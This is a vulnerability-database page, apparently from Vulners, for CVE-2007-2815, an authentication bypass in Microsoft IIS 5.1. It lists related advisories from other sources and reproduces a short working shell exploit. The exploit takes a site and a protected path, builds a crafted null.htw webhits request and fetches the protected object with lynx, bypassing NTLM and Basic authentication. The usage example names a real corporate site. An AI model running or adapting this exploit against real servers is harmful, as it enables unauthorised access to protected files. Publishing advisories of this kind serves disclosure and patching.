Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

🗓️ 02 Jun 2007 00:00:00Reported by RootType

Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit detecting null.ht

Reporter	Title	Published	Views	Family All 11
0day.today	Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit	31 May 200700:00	–	zdt
Check Point Advisories	Microsoft IIS WebHits Authentication Bypass - Ver2 (CVE-2007-2815)	3 Mar 201400:00	–	checkpoint_advisories
CVE	CVE-2007-2815	22 May 200719:00	–	cve
Cvelist	CVE-2007-2815	22 May 200719:00	–	cvelist
Exploit DB	Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass	31 May 200700:00	–	exploitdb
exploitpack	Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass	31 May 200700:00	–	exploitpack
Tenable Nessus	Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass	25 Mar 200800:00	–	nessus
NVD	CVE-2007-2815	22 May 200719:30	–	nvd
Packet Storm	CVE-2007-2815.txt	6 Jun 200700:00	–	packetstorm
Prion	Authentication flaw	22 May 200719:30	–	prion


                                                #
# NTLM &amp;amp;&amp;amp; BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf &amp;quot;USAGE:\t\t$0 &amp;lt;Site&amp;gt; &amp;lt;Protected Object&amp;gt;\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n&amp;quot;;
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&amp;amp;CiRestriction=b&amp;amp;CiHiliteType=full'
lynx -dump $evil

02 Jun 2007 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.85872

Microsoft IIS &lt;= 5.1 Hit Highlighting Authentication Bypass Exploit

Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit